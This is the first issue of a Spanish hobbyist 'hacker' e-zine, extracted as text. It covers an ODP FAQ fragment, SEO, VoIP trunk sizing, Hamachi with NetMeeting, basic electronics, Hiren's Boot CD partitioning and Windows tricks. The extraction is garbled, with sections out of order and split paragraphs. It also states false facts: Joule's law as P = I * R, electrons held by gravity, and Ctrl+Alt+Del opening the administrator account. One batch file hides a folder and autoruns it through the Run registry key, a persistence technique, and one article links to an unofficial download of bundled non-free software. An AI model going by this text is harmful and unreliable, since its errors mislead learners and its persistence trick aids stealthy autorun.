entidades listadas ni incluir en el directorio todas, ni siquiera la mayora de las pginas que posiblemente podran ser listadas. Tiene el ODP un servicio urgente que permita que mi pgina sea listada en menos tiempo? El ODP no tiene un servicio urgente similar a otros directorios comerciales, sin embargo, hay varias cosas que puede hacer para ayudar a que la revisin de su solicitud sea rpida. Primero, siga cuidadosamente las normas de envo. Segundo, debera revisar algunas de las polticas editoriales que usamos para listar los sitios. Una solicitud bien escrita y meditada tiene ms posibilidades de ser revisada antes que una descuidada. Sin embargo, no recomendamos sugerir un sitio en varias categoras distintas con la esperanza de que acabe siendo listada en una o dos de ellas. Con esto, no conseguir que Web sea listada antes, de hecho puede retrasar significativamente el proceso. Esto puede ser interpretado como spam y que al final su sitio no sea listado. Cmo consigo que listen mi sitio en ms de una categora? Debera sugerir su sitio a una nica categora, la que considere ms apropiada con sus contenidos. Por favor, sugiera su pgina una sola vez. Los editores de ODP se reservan el derecho de determinar en qu categora o categoras ser colocado su sitio utilizando su criterio editorial. Cunto tiempo tarda en aparecer mi sitio en los motores de bsqueda que usan los datos de ODP como AOL Search y Netscape Search? Una vez que su sitio ha sido listado en ODP , puede tardar dos semanas o ms en aparecer en los motores de bsqueda que utilizan los datos de ODP. Es responsabilidad de esos buscadores utilizar la ltima versin de nuestros datos. ODP no tiene ningn control sobre cundo terceras partes actualizan los datos provenientes de ODP. A quin le pido ayuda sobre mi sitio y sobre la categora ms apropiada para que sea listado? Si despus de explorar el enorme rbol de categoras, todava no est seguro de dnde debera enviar su sitio, la mejor opcin es sugerirlo en la categora que piense que mejor refleja sus contenidos. Los editores tienen la capacidad de mover su sitio a otra categora diferente o de crear una nueva si hiciera falta. Qu debera hacer si la categora a la que quiero enviar mi pgina no tiene un enlace "Agregar URL"? Unas pocas categoras tienen deshabilitado el enlace "Agregar URL" y no aceptan envos ni listan sitios. Debera encontrar otra ms especfica explorando las subcategoras.

Posicionamiento Web se necesita base de datos recupera la informacin dependiendo ( en realidad las web no estn hasta q alguien las visita ) la creacin de paginas es mas fcil rpido tiene mas recursos que puedes lograr Cual de las dos es mejor? La esttica segn he ledo se indexa mejor que la dinmica por que a google no le gustan los parmetros o 'sessID' o 'sessionID' ejemplo web.php?parametro5=7&parametro2 los ? = & no le gustan y no te indexara y si lo llegara a indexar no te posicionara por q al buscar google se basa en url, titulo , contenido y link q apuntan hacia tu web (las metas actualmente no son necesarias pero no esta de mas ponerlas bien) Dinamica es la mejor pero si no te indexa que se puede hacer ? path info o mod_rewrite en realidad son parecidas pero el mod_rewrite es mas flexible mod_rewrite para su uso necesitas servidor Apache con el mdulo mod_rewrite activado y permitido el uso de .htaccess ejemplo tenemos http://tuweb.com/tipo=buscadores&google=googlebot seria http://tuweb.com/buscadores/google/googlebot.html en prximos se har mas extenso este tema de mod_rewrite

Sitemaps
Un buen sitemaps es siempre muy bueno tenerlo ya que con esta herramienta google te indexa mas rpido tu contenido fresco http://www.google.com/webmasters/sitemaps/?hl=es

Page rank y conseguir quien te enlace


Esta creado por los fundadores google es un valor numrico que va de 0 a 10 conforme mas pagerank mas difcil es subirlo cuando alguien te linkea de la forma adecuada es como dar votos hacia tu Web. pero es mejor que no te linke aquellas webs que estn penalizadas por google (baneadas) eso te perjudica tambin alguna q contenga demasiados enlaces hacia a otras webs el pagerank lo puedes ver bajndote la barra google y en algunos sitios y como deberan ser los links a continuacin

Url amigables
Esto va enfocado a sitios dinmicos Que es un Web dinmica y una esttica? -Web esttica muestra el mismo contenido siempre, para agregar contenido se tiene que modificar la Web a veces por completo aunque con el CSS se pueden hacer grandes logros -Web dinmica son creadas segn al que te visita en la mayora de los casos

Manejo correcto de los links


La mejor forma de poner los links es link de texto ejemplo <Ahref=http://www.webom/quiero-a-google.html> quiero a google</A> seguramente le has dado en cache a busqueda en google algunas veces solo aparece solo se encontraron trminos q apuntan hacia esta pagina

Herramientas google

CUH e-zine vol #1 - 1 edicion


El mismo google te da herramientas para lograr una buena indexacin Asistente informativo sobre el estado del sitio Descubra si su sitio forma parte ya del ndice de Google. Blog de Google destinado a webmasters (ingls) Las ltimas novedades y las noticias ms recientes relacionadas con los sistemas de rastreo e indexacin de sitios web utilizados por Google. Herramientas para webmasters (incluido Sitemaps) Estadsticas, diagnsticos y administracin de los procesos de rastreo e indexacin que realiza Google de su sitio web, incluidas funciones como el envo de Sitemaps y la generacin de informes. Foro de debate de Google para webmasters Entable conversacin con otros webmasters y comparta sus ideas con nosotros. Enve contenido a Google Descubra los mtodos para enviar contenido a distintos servicios de Google, como Google Base y Google Libros. Centro de Asistencia para webmasters Consulte las respuestas a las preguntas ms frecuentes formuladas acerca del rastreo, la indexacin, la clasificacin y otros muchos temas. todo ello aqu http://www.google.com.mx/intl/es/webmasters/ mas captulos posteriormente como robots.txt cuanto es lo mximo que debe pesar tu Web que no contenga errores como te puede penalizar y mas

Posicionamiento Web

By XD (DJChileOut) Servicios Google

CUH e-zine vol #1 - 1 edicin

vozIP para empresas

Diseo para implementar VozIP en una Empresa


Contenido:
1.2.3.4.5.Introduccin Requerimientos Recursos Clculo del Trfico Diseo y calculo

by juca
La peticin de llamadas de los usuarios esta descrita en el grfico y la hora mxima de actividad, misma que es a las cuatro de la tarde de igual manera se hizo un promedio 12 personas hablando en un promedio de 6 minutos (Esto es entre Quito Guayaquil) Red Wan Quito - Guayaquil

1.- Introduccin
En vista del aumento de la demanda por implementar una red con VozIP es importante saber los elementos necesarios para poder realizarla. As como tambin tomar en cuenta todos los clculos que son necesarios para ponerla a funcionar de una manera correcta y que asegure una excelente comunicacin. Lo planteado aqu es una solucin real que se ejecut y que utiliza un enlace WAN entre 2 ciudades grandes dentro de Ecuador (Quito - Guayaquil).

3.- Recursos
Tipo de Recursos El tipo de recurso va a ser el 30% circuitos y el 70% paquetes. La empresa cuenta con cableado estructurado. Ingeniera de Trfico El mtodo para desarrollar esta infraestructura de telefona IP ser ASTERISK con un servidor GNU/Linux, con switch FXS FXO. Base de Datos MySQL Se utilizarn telfonos IP y Softphone Asterisk ofrece los siguientes servicios: Transferencia Ciega Pickup de Llamada Buzn de Voz Caller ID Msica en espera Llamada en Espera Colas de llamada Timbres Distintos Conferencias Lneas digitales E1. El protocolo de comunicacin ser el SIP, esto ser tanto en Quito como en Guayaquil Audio Codec ser g.729 de 8 kbps

2.- Requerimientos
La peticin de llamadas de los usuarios esta descrita en el grfico y la hora mxima de actividad, a las tres de la tarde tenemos 200 personas llamando esto es en las horas pico y con un promedio de duracin de las llamadas de 6 minutos. Red Lan Dentro del Mismo Edificio

CUH e-zine vol #1 - 1 edicin


Se desea tener una buena calidad de servicio lo cual sin brinda ASTERISK. El grado de servicio ser 1%.

vozIP para empresas

Grado de Servicio El grado de servicio es 1% Nmero de Extensiones analgicas y digitales El nmero de extensiones analgicas sern 90 El nmero de extensiones digitales sern 210

4.- Clculo del Trfico


Red LAN A = * tm A= (200*6)/60 = 20 Erlang Red WAN A = * tm A= (12*6)/60 = 1,2 Erlang

Telfonos IPs Necesitaremos 17 telfonos IP

Hora Pico En la red LAN es a las 15:00 horas se producen 200 llamadas con un promedio de 6 minutos. Necesitaremos 193 softphones

En la red WAN es a las 16:00 horas se producen 12 llamadas con un promedio de 6 minutos.

90 telfonos analgicos

CUH e-zine vol #1 - 1 edicin


5.- Diseo y calculo
Para hacer el calculo de las troncales se hace con la ayuda de la calculadora ErlangB adems que ya se tiene el calculo de los erlang que es 20

vozIP para empresas

El ancho de Banda que ocupara en horas pico ser de 283.5 Kbps, esto es entrante y la saliente tiene el mismo valor, lo da un total de banda para ocupara de 567 Kbps.

Por lo tanto el canal para contratar entre Quito - Guayaquil ser de 1024 Kbps.

Trafico ser 20 Erlang El nmero de circuitos ser 30 en este caso se contratar un E1** GOS 1% ** E1 en velocidad equivalente a 2048 Mbps ** E1 Permite 30 canales como mximo. El ancho de banda que se requiere para integrarse a la red WAN. De igual manera para el ancho de banda se utilizo una calculadora llamada Bandwidth Calculator. Ms Informacin: http://www.asteriskguru.com http://www.asteriskguru.com/tools/bandwidth_calculator.php http://es.wikipedia.org/wiki/Asterisk http://www.digium.com/en/index.php

Manual realizado por JUCA

CUH e-zine vol #1 - 1 edicin

Conectar 2 PCs

Conectar 2 PCs con NetMeeting y Hamachi

by Logan_Doax

Antes que nada este tutorial sirve para los que tengan Windows xp Bueno este tutorial es un aporte 50% mo (Logan_Doax) y 50% de alfai; el proposito es que se puedan conectar 2 computadoras mediante el NetMeeting, un programa que permite compartir y enviar archivos o el mismo escritorio entre dos pcs en red. Pero el primer inconveniente seria que, algunos cuentan con un modem de alta velocidad y/o un router, este pues cambia la direccin ip de una computadora y seria imposible conectarse a una con un router. Para eso utilizaremos un programa que se llama hamachi. Un programa que simula una red. Descarga http://www.hamachi.cc/download Una ves que lo hagamos descargado lo instalamos, esto es muy fcil. Ojo: si te pide si deseas instalar en modo Premium tu dale que no, mejor selecciona la casilla que dice que es free; esto para evitar futuros problemas. Ya instalado lo ejecutamos: Los ms probable es que, como seria la primera vez que lo ejecutas te pedir crear una red o un usuario para identificarte, hazlo y cuando termines pasas al siguiente paso.

En mi caso, ya tengo redes unidas a mi hamachi; ustedes no se preocupen pueden agregar las que ustedes quieran. De hay presionamos el botn de en medio:

Nos aparecer una minipantalla como esta:

Como se seala, le damos clic al botn de power. Cargara unas cuantas cosas (3 en total). Y despus les aparecer algo as:

Y de hay a Crear nueva red ... Les aparecer un recuadro como este:

CUH e-zine vol #1 - 1 edicin

Conectar 2 PCs

Crear la red es tan fcil y sencillo que solo basta con ponerle un nombre a la red y darle una contrasea. Pues la creas XD Y despus aparecers en la ventana principal del hamachi. Ojo: ese numero que comienza con 5, es tu ip hamachi, recuerda esto. de Bueno de vuelta al hamachi; una ves que t y el amigo o persona a la que te vallas a conectar haigan instalado el hamachi. Uno de los dos se una a la red creada por uno de ustedes; por ejemplo tu te unes a su red o el a ti. (El que se valla a conectar debe seguir el siguiente paso; en este caso tu te conectaras a el).

Bueno ahora queda configurar el NetMeeting: Vamos a inicio / ejecutar y escribimos conf

Solo dale de nuevo al botn de en medio del hamachi, pero esta ves le das a unirse a la red.

Si aparece un asistente le damos a siguiente, hasta que aparezca un cuadro que pide El nombre, direccin, e-mail, etc. Si quieres puedes poner datos falsos y tu correo seria lo nico verdadero. XD Despus de terminar el asistente te aparecer la ventana del NetMeeting

Hay solo escribes el nombre de su red y la contrasea, despus le das click a unirse, Y ya estars en su red. Ahora al NetMeeting y te vas al siguiente campo:

CUH e-zine vol #1 - 1 edicin

Conectar 2 PCs

Una vez conectados pueden utilizar los botones que vienen en la ventana del NetMeeting para:

(Les dir la accin de izquierda a derecha) Compartir programa: Esta funcin nos sirve para compartir programas en ejecucin y hasta el mismo escritorio. Ejemplo:

Hay ingresaras el numero ip de tu amigo se lo pides o te fijas en el hamachi (su ip esta al lado de su nombre de usuario o red). Y le das clic al botn de llamar. IMPORTANTE: tu amigo debe tener NetMeeting para que reciba la llamada. abierto el

Una ves que tu amigo reciba la llamada le da a aceptar y estarn conectados. Ejemplo:

En este caso esta deshabilitado todo porque no estoy conectado a nadie. XD Conversacin: su nombre lo dice puede iniciar un Chat entre ambos usuarios. XD

CUH e-zine vol #1 - 1 edicin

Conectar 2 PCs

Pizarra: abre una ventana de paint a ambos usuarios para que puedan compartir y dibujar en . una pizarra al mismo tiempo, los cambios que se hagan se vern en tiempo real Transferir Archivos: su nombre lo dice sirve para enviar archivos entre ambos usuarios.Una vez que se quieran desconectar solo dale clic al botn colgar: Y listo. Tambin pueden intentarlo con otros S.O. aparte de Windows, pero el programa a utilizar para conectarse ya no seria el NetMeeting. Pero si se usara el hamachi debido que se puede descargar para linux, Mac, etc

Para la CUH E-zine Foro el-hacker.com

Utensilios y dispositivos para la instalacin fsica de redes :

Conector RJ45

Ponchadora

Cable UTP

Tarjeta Modem

CUH e-zine vol #1 - 1 edicin

Introduccin a la electrnica

Introduccin a la electrnica
Bienvenidos , mi nombre es elektro y es mi misin guiarlos durante este viaje. De mi solo puedo decirles que he dedicado buena parte de mi tiempo al estudio tanto formal como informal de la electrnica y que la robtica es para todo aquel que ama la tecnolgica, un fascinante paso ms. Me tomo bastante tiempo decidir como deba comenzar esta seccin, y tal vez debido a mis tiempos acadmicos no puedo evitar pensar que es necesaria una mnima introduccin a la electrnica. Si, seguro que muchos que estn leyendo esto ya saben que es un electrn y cuales son los efectos que produce su movimiento a travs de los diferentes materiales, pero seguro que tambin hay mucha gente que no y prefiero dejar esta informacin bsica planteada ahora, para que despus sirva como referencia y siempre la tengamos a mano. Bueno, empecemos por el principio..... Nuestro amigo el tomo:

By Elektro
Corriente elctrica.
Electrones libres. Que pasa si un electrn escapa de su orbita? Debido a la excitacin trmica normal que todos los materiales tienen o al calor externo, algunos electrones de la ltima orbita del tomo absorben una fraccin de energa y gracias a ella vencen la fuerza gravitatoria que los mantiene en orbita al ncleo lo que les permite liberarse. Ellos permanecen libres slo una fraccin de segundo, pero en todo momento son billones de ellos los que se encuentran libres en el espacio inter-atmico en una sustancia particular. Si estos electrones se mueven en una misma direccin, tenemos lo que se conoce como flujo de corriente o corriente elctrica. Para lograr que este movimiento de electrones se d en un sentido o direccin, es necesario una fuente de energa externa (Ej. Batera), siendo que las cargas iguales se repelen y las diferentes se atraen, los electrones escaparan del borne negativo (-) de la batera para llegar el positivo (+) de la misma.

Esta representacin sigue el modelo atmico de Bohr, el cual fue una mejora de modelos anteriores planteados por otros cientficos. No vamos a entrar en mucha profundidad, solo vamos a decir que el tomo que vemos en el dibujo esta compuesto por un ncleo en el cual se encuentran los protones y neutrones (de cargas elctricas positiva y neutra respectivamente) y en el exterior, orbitando este ncleo estn los electrones (carga elctrica negativa). En estado de equilibrio los electrones igualan en numero a los protones.

La cantidad de corriente elctrica que circula por un conductor se denomina intensidad de corriente, se representa con la letra I, y nos indica la cantidad electrones que pasan por un punto en una determinada fraccin de tiempo. La unidad de medida es el Amperio (A). Esta unidad es equivalente a un Coulomb / Segundo, el Coulomb es una unidad de carga elctrica y equivale a 6.241 509 629 152 651018 electrones (muchos no?) . Llegamos al momento de tener que decir, que si bien la corriente es el resultado del movimiento de los electrones, por convencin la corriente en un circuito se toma en sentido contrario. Se considera entonces que la corriente circula desde el borne positivo al negativo, cuando en realidad los electrones estn circulando desde el borne negativo al positivo.

CUH e-zine vol #1 - 1 edicion


Materiales conductores y no conductores
Algunos materiales tienen muchos ms electrones libres que otros, esto es debido a que sus electrones estn ligados ms dbilmente al ncleo, por lo tanto permiten que se establezca una corriente elctrica a travs de ellos . Estos materiales reciben el nombre de conductores. Los principales materiales conductores son: el oro, la plata, el cobre y los metales en general. Los materiales que tienen pocos electrones libres no permiten el flujo de electrones a travs de ellos y reciben el nombre de materiales no conductores o aislantes, los mejores son: el vidrio, la porcelana, la mica, los materiales plsticos, etc. Los elementos que se encuentran en la situacin intermedia entre los conductores y los no conductores son los denominados semiconductores el ms conocido e importante es el silicio, y los mismos nos permite fabricar diodos, transistores, circuitos integrados, etc. Como dato el aire y el agua son aislantes tambin.... Si, el agua, pero CUIDADO, solo el agua pura desde el punto de vista qumico (H2O), en cuanto el agua tiene sales y dems elementos (el agua corriente que tomamos los tiene) se convierte en un conductor.

Introduccin a la electrnica resistencia y medir la corriente y la tensin de la misma para diferentes valores de resistencia. Bueno, para cerrar esta quizs tediosa parte terica creo oportuno comentarles otra ley, que en la electrnica de estos das la sentimos constantemente, y es la: Ley de Joule

P = I * R

Tensin, corriente y resistencia elctrica:


Mucha, pero mucha gente confunde los conceptos de tensin y corriente elctrica, y es lo mas normal realizar una comparacin con el modelo hidrulico, que es mucho mas visible y nos permite, a partir de el, comprender su equivalente elctrico. Veamos, tenemos un tanque de agua con su nivel a una altura h, un caudal q que baja por la caera y una resistencia aportada por un grifo semi cerrado que denominaremos r. Cuanto mayor sea la altura h, mayor ser la presin de agua y por lo tanto mayor ser el caudal. Por otra parte si cierro aun mas el grifo, el caudal a la salida del sistema se reducir. Si entienden esto bien, entonces solo tenemos que cambiar los nombres para pasar al caso elctrico. La altura es el potencial elctrico o tensin, el caudal es equivalente la corriente y la resistencia que opone el grifo al paso del agua se puede considerar anloga a una resistencia elctrica (como la que tiene la plancha dentro) Entonces, pensando ahora todo en trminos elctricos, tenemos que la corriente es directamente proporcional a la tensin (si aumenta uno aumenta el otro y viceversa) e inversamente proporcional a la resistencia (a mayor resistencia, menor corriente). De aqu se desprende la ley mas bsica y fundamental de la electricidad: La ley de Ohm

Esta ley nos da el porque de una resistencia, o cualquier aparato elctrico, que en definitiva puede representarse en parte como una resistencia, levanta temperatura, obvio que es mucho ms complejo que esto, pero esta ley rige la transformacin de energa elctrica en calor, siendo P la potencia calrico en Watts. Bueno, por esta entrega creo que es suficiente, en las prximas ya pondremos manos a la obra y veremos cosas ms interesantes, circuitos, componentes y dems. Esta base era necesaria ya que sin ella no podemos hablar el mismo idioma. Hasta Pronto Mas informacin al respecto:

http://csep10.phys.utk.edu/astr162/lect/light/bohr.html El modelo atomico de Bohr http://newton.cnice.mecd.es/3eso/electricidad3E/similhi draulico.htm El equivalente hidraulico (animacion Java) By Elektro
Robot --> Una mquina que puede decirse tiene la capacidad de "sentir" y reaccionar y efectuar tareas complejas, actuando de cierta manera (inteligencia artificial) , segun las circuntstacias saca deducciones y toma desiciones , ejecutando labores especilizadas y mecanicnizadas, idealmente sin la supervision de humanos. Aunque actualmente se disean robots que intetan imitar los movimientos humanos para realizar trabajos altamente complejos y de maximo detalle y perfeccion, ellos raramente son parecidos a nuestra apariencia. Normalmente se usan los robots en la produccion de automviles y computadoras en linea. Robtica . Rama de la ingeniera que tiene por objeto disear, programar y construir robots. lo s Robticos trabajan dentro de una gama amplia de ramas ya sea cientfica abarcando areas como son: la ingeniera electrnica y la ingeniera mecnica, ciberntica, binica, e inteligencia artificial, buscando la finalidad de dotar las nuevas generaciones de robots capaces tanto de aprender, mayor capacidad sensorial, y por que no decir mejor destreza fsica, sin dejar atras que tambien se busca independencia, y flexibilidad . Nota Editorial

I=E/R
Siendo E diferencia de potencial (tensin). Como comentario es bueno saber que esta es una ley emprica es decir que se obtuvo de manera experimental, que para este caso consiste simplemente en armar un circuito con una pila, una

CUH e-zine vol #1 - 1 edicin

Uso del hirens boot - Particin de discos

Particionado y disco duro

by |_ocutus
Tal vez cuando lean esto ya este x otra versin o el link este roto, para bajarlo buscar en google o en cualquier p2p ya q no hay pagina fija d donde bajarlo debido a restricciones d licencias y todas esas cosas ya q obviamente mucho del soft incluido no es free.

Hiren's boot CD
Hirens Boot CD es un cd d booteo q contiene varios programas d diagnostico como agentes d particionamiento y clonado d discos, medicin d performance del sistema, recuperacin d informacin, herramientas para MBR, herramientas para BIOS y muchas otras para reparar diversos problemas d pc. El mismo es 1 CD booteable, x lo tanto es til aun si el so no c puede inicializar. Posee utilidades d similar funcionalidad agrupadas en los submens y a pesar d q algunas hacen el mismo trabajo nos dan posibilidades para elegir entre distintas interfaces d usuario.

Creacin del CD
1 vez q tengamos el archivo rar procedemos a descomprimirlo y nos encontramos, adems d algunos txt, con 1 archivo con extensin ISO q es la imagen del Hirens. Adems d 1 dir (keyboard patch) q sirve para cambiar la configuracin del teclado q x default viene en ingles. Al q no le interese la conf d teclado puede quemar el ISO directamente con Nero. Para cambiar la configuracin copiar en 1 mismo directorio el contenido d keyboard patch y la imagen ISO, ejecutar Patch.bat y seleccionar desde ah el tipo d teclado. Una vez listo quemar la imagen con Nero o el programa q les guste.

Uso del CD
Para poder bootear con el hirens lo 1ero es tener la unidad d CD como 1er dispositivo d booteo. Esto lo cambiamos desde el setup d la pc, x lo gral lo encontramos en 1 men llamado Boot Device Priority o algo parecido. Tendra q quedar algo as: El Hirens debera ser 1 herramienta indispensable para cualquier tcnico o persona q pretenda reparar 1 pc, desde 1 simple particionamiento hasta recuperar sectores defectuosos en 1 hd pasando x cosas tan variadas como borrado y/o recuperacin d passwords tanto d sistema como d BIOS, soporte USB y SA TA, posibilidad d levantar 1 red fcilmente... todo en la + pura consola d dos. Todos los progs contenidos en el CD tambin tienen su versin x separado, pero la ventaja d este disco es justamente no tener q depender d nada para poder usarlas, solamente 1 lectora y booteo desde el CD (tambin c puede hacer en versin USB), cosas q cualquier pc tiene hoy en dia. Pueden ver la lista d progs contenidos en el mismo desde ac: http://www.hiren.info/pages/bootcd La ultima versin a la fecha es la 9.1 q puede ser descargada desde aca: http://rapidshare.com/files/34106649/hiren_bootcd_9.1_en .rar

Guardar cambios, reiniciar y al bootear con Hirens nos sale 1 menu como este

: desde ah podemos elegir entre iniciar el Hirens (Start BootCD) o seguir con el booteo normal del S.O. (Boot

CUH e-zine vol #1 - 1 edicin


From Hard Drive). Al entrar a la opcin d Hirens nos encontramos con este men:

Uso del hirens boot - Particin de discos

Como no creo q a nadie le interese el disco fsico mucho + all d esto vamos al sentido + practico d las cosas... El disco tal como lo compramos no puede ser reconocido x formatearla con algn sistema d archivos q sea reconocido x nuestro S.O., esto es lo q c llama la estructura logica del disco. La misma esta formada x el MBR (Master Boot Record o Sector d Arranque) y luego las particiones y el espacio sin particionar si es q hay alguno. El MBR esta ubicado en el sector 0 del disco y contiene la tabla d particiones adems d 1 programa q lee la misma y delega el control al sector d arranque d la particin activa, si no hay ninguna muestra 1 mensaje d error. Tenemos varios tipos d particiones, la + comn es la primaria q es la q c usa normalmente para instalar 1 S.O. Despus tenemos particiones extendidas q c usan como contenedor para las unidades lgicas.

seguido x este despus d presionar next:

en este punto ya estamos listos para ejecutar cualquiera d las aplicaciones prcticamente, solo tenemos q elegir q es lo q queremos segn el problema.

Particionamiento de discos
Los discos rgidos (tambin llamados duros) datan del ao 1955, cuando fueron presentados con el IBM 305. A travs del tiempo cambiaron bastante hasta llegar a lo q son hoy en da. Actualmente el disco esta formado fsicamente x 1 grupo d platos concntricos q giran a la vez a velocidad constante desde q c enciende la pc, cada uno d ellos tiene 2 superficies magnticas, la superior y la inferior. Estos platos tienen 1 grupo d brazos alineados en la punta d los cuales estn los cabezales d lectura/escritura, estos brazos pueden moverse hacia adentro y afuera para poder recorrer toda la superficie del disco. En el grafico vemos 1 estructura d disco donde comienza con el MBR en el arranque, sigue con 1 particin primaria tpica y despus tiene 1 particin extendida q contiene 2 unidades lgicas seguido x 1 espacio sin particionar. En este caso veramos 3 unidades d disco en nuestro sistema suponiendo q todas tuvieran formato. Con esta base vamos a ver como podemos formatear y hasta alterar particiones con el Hirens.

Partition Magic Pro v8.5


Desde el menu principal del hirens vamos a: 1.Disk Partition Tools... y despues a: 1.Partition Magic Pro v8.5 Vamos a crear las mismas particiones del grafico d arriba en 1 disco d 2 Gb. Empezamos con el disco vacio sin particin ni formato alguno.

Las 2 caras del plato son utilizables, x lo tanto cada brazo es doble y tiene 1 cabezal para la parte superior del mismo y 1 para la inferior. Los cabezales jams tocan la superficie ya q la rayaran inmediatamente y c daara.

Lo 1ero es crear una particin primaria d digamos... 500mb, entonces vamos a Operations y d ah a Create, con esto c despliega el men d creacin d particiones al cual le tenemos q hacer algunos cambios. Vamos a hacer d cuenta q vamos a instalar 1 sistema XP... a una en 500mb va

CUH e-zine vol #1 - 1 edicin


a estar difcil... xD Create as cambiamos Logical Partition x partition Partition Type NTFS Size 500Mb Cluster Size lo dejamos en Default NTFS Version 3.1 (Windows XP) Primary

Uso del hirens boot - Particin de discos

tiene sectores rotos en el medio, la mejor solucin es crear particiones alrededor d los mismos para evitar dichos sectores.

con esto ya tenemos la primaria, siguiendo el mismo procedimiento creamos las otras 2 como lgicas asignndoles tambien 500mb a c/u, para poder hacerlo hay q hacer click en Unallocated en la pantalla principal, o sea en el espacio sin usar. Todos los cambios q hacemos los vamos viendo en la parte superior en forma grafica y en la inferior en modo texto. Con las otras 2 particiones quedaria asi:

Otra opcin muy interesante es la de Resize/Move, q nos permite cambiar el tamao d 1 particin o moverla (siempre q sea posible) d manera muy fcil .Con esto ya pueden particionar tranquilamente y hacer unas cuantas cosas +... solo es cuestion d agarrar algun disco viejo y ponerse a experimentar. El Partition Magic es el + facil d usar pero sabiendo ya la teoria tienen otras utilidades para particionar + avanzadas y con + posibilidades dentro del mismo Hirens. Cuando el Partition no tenga secretos empiecen con las otras a ver q les parece. En los prximos numeros (si todo sale bien y los hay.. :P) vamos a seguir viendo las utilidades del Hirens... No rompan muchos hds!!! xDD

Ah tendramos la misma estructura q la del grafico salvo x el MBR q no c puede ver. Ntese tambin q al crear la particin en el mismo men d creacin q veamos sobre la parte superior derecha tenemos la opcin d comenzar la particin al comienzo o al fin del espacio vacio... con lo q podramos dejar la parte sin particionar en medio del disco. Para q servir esto? dirn... imagnense q el disco

|_ocutus

CUH e-zine vol #1 - 1 edicin

Varios trucos WIndows

Trucos varios de Windows XP


Este articulo se trata de una serie de truquitos para el sistema operativo Windows, los cuales que uno aprende casi todos los das por ah.

Editorial
Print screen: Tecla que hace una captura todo lo que haya actualmente en la pantalla Alt + Print screen: Hace una captura solamente de la ventana actual

PC sin mouse?
A cuantos no nos ha pasado que el mouse deje de funcionar, y pues si no sabemos unas cositas, no podemos hacer nada, la tecla mas importante para empezar es la tecla Windows Tecla Win identificada en casi todos los teclados por el popular logo de las ventanitas. Aqu no explico los mtodos, solamente hago mencin a las teclas que nos ayudaran a movernos y trabajar, casi que comn y corriente Tecla Win o Windows: Ejecuta el men inicio, adems servir de combinacin junto con otras teclas para los atajos de teclado del Windows. Tab : En el explorador de archivos, nos mueve por la barra de direcciones y por el panel lateral, tambin puede ser usada en otras ventanas. Alt + F4 : Cierra la ventana actual. Flechas de desplazamiento: Nos ayudan a movernos por los distintas interfaces. Alt : Si la oprimimos sola, activa la barra de mens, acompaada de la primer letra de cada men lo abrir indefectiblemente Esc : Anula cualquier accin o evento indeseable, no cierra ventanas ni nada por el estilo. Win + L: Nos manda a la pantalla de bienvenida, evitando, as ser husmeados o que se yo! Win + R : Abre la ventana Ejecutar. Win + U: Abre el Administrador de Utilidades Win + E: Ejecuta el explorador de archivos Win + F: Abre el buscador de Windows Win + C : Muestra el dialogo de la conexin. Alt +92 : Muestra el importante carcter \ Alt + 126: Muestra el carcter ~ otro importante

F1: Tecla de utilizad para la ayuda de Windows, y de casi todas las aplicaciones. Ctrl + Alt + Supr: En la pantalla de inicio, si lo oprimimos dos veces nos abre la cuenta de administrador, en el Windows normalmente llama al administrador de tareas. Ya saben si se les daa el mouse, dont fear.

Como crear una Unidad virtual


Esto es algo que es muy sencillo y tambin muy til, adems de ser muy fcil, voy a poner el cdigo del archivo bat que crearemos para hacerlo y la explicacin lnea a lnea

Virtualdrive.bat
Cd\ Nos ubicamos en el directorio Raiz Md Hacking Creamos la carpeta hacking Attrib +h +r +s c:\hacking Ponemos atributos especiales a la carpeta hacking Subst Z: c:\hacking Creamos la Unidad virtual Luego modificamos esta clave:

HKEY_CURRENT_USER\software\microsoft\windows
\CurrentVersion\run valor alfanumrico con el nombre del programa (en este caso Virtualdrive.bat) como valor y la ruta donde hemos alojado el programa como la informacin del valor. Esto hara que cada vez que iniciemos, se ejecute el bat, y por ende tener siempre disponible nuestra unidad virtual.

CUH e-zine vol #1 - 1 edicin


Variables de le sistema
Windows maneja unas variables, tales como son: el nombre del equipo, directorio del sistema, sistema operativo, el truco es este

Varios trucos WIndows

Infosistema.bat
set>c:\informacion.txt sisteminfo>>c:\informacin.txt net view >>c:\informacin.txt ipconfig all>>c:\informacion.txt type c:\informacion.txt |more Existen muchos comandos que podramos implementar para obtener informacin, De esta forma en el directorio raz tendremos un archivo llamado informacin.txt que contendr informacin valiosa sobre el computador.

Programas especiales
En Windows existen una serie archivos (que a la vez son programas) que nos sirven para realizar tareas, tanto de configuracin, recuperacin, o administracin, accesibilidad, y muchas cosas mas, por lo general, nosotros los usamos accediendo desde los accesos directos, pero todos ellos son archivos ejecutables, en la mayora de los casos. Ejemplos palpables de ello son los muy usados archivos mmc.exe, msconfig.exe, gpedit.msc, charmap.exe, y por nombrar solo unos pocos y su carpeta de origen casi siempre es: C:\windows\system32 Otra de las cosas importantes de Windows es su sistema de bsqueda, permitindonos hacer bsquedas complejas pero a la vez con un criterio fcil de seguir, por ejemplo, podemos buscar imgenes solamente, archivos ocultos y del sistema, con un criterio de fecha en particular, en fin es fcil de usar, solo hay que ser un poco intuitivo, de ms esta decir es una herramienta imprescindible, otra cosa importante es el uso de los comodines -> * ?, el asterisco remplaza una letra o varias letras de la bsqueda, por decir queremos encontrar solo los archivos ejecutables del sistema, vamos a inicio->ejecutar-> all escribimos c:\windows\system32 y seleccionamos la opcin buscar:

Escogemos la opcin todos los archivos

CUH e-zine vol #1 - 1 edicin

Varios trucos WIndows

Y all definimos la bsqueda de la siguiente manera *.exe o *.msc o ????pad.exe , en fin Otra herramienta que tenemos que aprender a usar constantemente es: El Administrador de Tareas, taskmgr.exe, Esta si que es importante para el manejo eficiente de los recursos, desde all podemos ver procesos, matar procesos, ver las aplicaciones en uso, analizar el uso de la red y del procesador, todas ellas taretas que son muy importantes estar checando regularmente. Para acceder a ella podemos hacerlo asi: Ctrl + Alt + Supr, tambin escribiendo taskmgr en la ventana ejecutar, o haciendo clic derecho sobre la barra de tareas

Otro programa que me fascina y me ha salvado de muchas es el rstrui.exe en otras palabras Restaurar Sistema, ubicada en la carpeta: C:\WINDOWS\system32\Restore este programa es el encargado de restaurar el sistema a un punto de previo de control

Claro que el manejo de esta herramienta necesita un apartado especial y solo hago una referencia no mas, en otro capitulo aprenderemos a usarlo eficientemente. Por el momento eso es todo amigos, espero les hayan gustado el articulo.

CUH e-zine vol #1 - 1 edicin

El Registro de Windows XP

El Registro de Windows XP
